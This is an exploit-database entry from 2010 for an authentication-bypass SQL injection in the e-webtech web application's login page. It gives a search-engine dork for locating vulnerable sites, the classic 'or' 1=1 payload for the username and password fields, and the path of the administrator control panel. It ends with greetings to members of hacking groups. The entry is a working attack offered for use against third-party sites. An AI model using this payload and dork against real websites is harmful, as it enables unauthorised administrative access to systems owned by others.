e-webtech (page.asp) IMPROVED SQL Injection Vulnerability

2010-05-11T00:00:00
ID 1337DAY-ID-12204
Type zdt
Reporter s1ayer
Modified 2010-05-11T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =========================================================
e-webtech (page.asp) IMPROVED SQL Injection Vulnerability
=========================================================

Author: s1ayer
  
Mail: [email protected]
  
Script Name: e-webtech
  
Dork: "Powerd by www.e-webtech.com" or by "e-webtech"
-------------------------------------------------------------------------------------------
  
User Exploit:
'or' 1=1  

Password Exploit:
'or' 1=1 
 
Administartor Panel:
 
http://[sitename]/[path]/controlpanel/

============================================================================

above improvement has been for the paper published in http://inj3ct0r.com/exploits/12203 by CoBRa_21

as some of the sites pwd column name was changed so by the exploit mentioned for the password was not getting executed correctly

or instead of finding the password we can use the code given in the password column....

although admin name was getting successfully executed from the exploit given by CoBRa_21 but with the exploit code of 'or'1=1 admin name 

is not an issue................
=======================================================================================================
site: www.andhrahackers.com

GREETZ: jappy,r45c4l,sai bro,sm4rt h4x0r, b0nd bro, GODWIN AUSTIN,fb1, Mr XXXXX

shoutz: eXeSoul,coolt04d,Mr.kewl and all ICW and andhrahackers member 

JAI MATA DI.......................................................

JAI HIND...........................................................



#  0day.today [2018-01-04]  #